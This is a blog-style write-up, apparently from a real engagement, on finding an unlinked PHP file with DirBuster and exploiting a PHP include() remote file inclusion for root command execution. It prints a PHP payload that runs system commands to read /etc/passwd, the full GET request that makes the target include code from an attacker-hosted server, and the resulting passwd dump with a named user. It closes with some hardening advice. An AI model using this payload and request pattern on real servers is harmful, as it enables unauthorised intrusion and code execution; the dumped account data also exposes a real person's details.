Exploiting unlinked content using DirBuster, PHP Include() and getting Remote Command Execution (RCE)


Acronis Cyber Protect

This is a real world example – using DirBuster we were able to discover an unlinked file named sugar.php which we enumerated by requesting the  “sugar.php” resource file which returned an error message PHP error: “<b>Error</b>: include(): Filename cannot be empty in”. The valid parameter name “display=” was found using a custom parameter brute forcing script. The display variable passed containing a URL of a remote server to execute arbitrary code running with elevated privileges. This means that the server is now owned, we can now execute arbitrary code as root!

Mistake number one should be axiomatic, never run a webserver with system privileges, if your running apache deamon than launch the webserver with that username and restrict the accounts access to the absolute minimum required to operate your webserver. Code execution was possible due to the use of PHP include() statements interpreting PHP code that is passed in the function call. Because user input was passed directly to this function it allowed for arbitrary code execution. There a lot of mistakes this particular admin made. I would advise any of you who are webmasters to check your server’s right now and make sure you don’t have any directories or files you forgot about that could be misused to gain access to your server.

Here is what the attack looks like,

Here is our proof of concept code – unlinked.php:
<?php echo system(‘uname -a && cat /etc/passwd’);?>

Here is our get request to the vulnerable script:

GET /sugar.php?display=http://192.168.1.100:9999/unlinked.php HTTP/1.1
Host: xxxxxxxxxxxxxxxxxxx.org
User-Agent: Mozilla/5.0 (Windows NT 6.4) Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Server Response to query:
HTTP/1.1 200 OK
Date: Mon, 07 Sep 2015 11:36:56 GMT
Server: Apache/2.4.12 PHP/5.5.21 OpenSSL/1.0.1a
X-Powered-By: PHP/5.5.21
Content-Length: 2304
Connection: close
Content-Type: text/html

Linux TakemeHome 3.16.0-37-generic #51-Ubuntu SMP Tue May 5 13:45:59 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
syslog:x:100:103::/home/syslog:/bin/false
messagebus:x:101:105::/var/run/dbus:/bin/false
uuidd:x:102:107::/run/uuidd:/bin/false
dnsmasq:x:103:65534:dnsmasq,,,:/var/lib/misc:/bin/false
avahi-autoipd:x:104:114:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
speech-dispatcher:x:105:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
rtkit:x:107:115:RealtimeKit,,,:/proc:/bin/false
saned:x:108:116::/home/saned:/bin/false
usbmux:x:109:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
whoopsie:x:110:117::/nonexistent:/bin/false
avahi:x:111:118:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
lightdm:x:112:119:Light Display Manager:/var/lib/lightdm:/bin/false
pulse:x:113:122:PulseAudio daemon,,,:/var/run/pulse:/bin/false
colord:x:114:124:colord colour management daemon,,,:/var/lib/colord:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
ry4wn:x:1000:1000:Ryan Andes,,,:/home/ry4wn:/bin/bash
sshd:x:116:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:117:126:MySQL Server,,,:/nonexistent:/bin/false
proftpd:x:118:65534::/run/proftpd:/bin/false
ftp:x:119:65534::/srv/ftp:/bin/false
snort:x:120:127:Snort IDS:/var/log/snort:/bin/false
tomcat7:x:121:128::/usr/share/tomcat7:/bin/false



Leave a Comment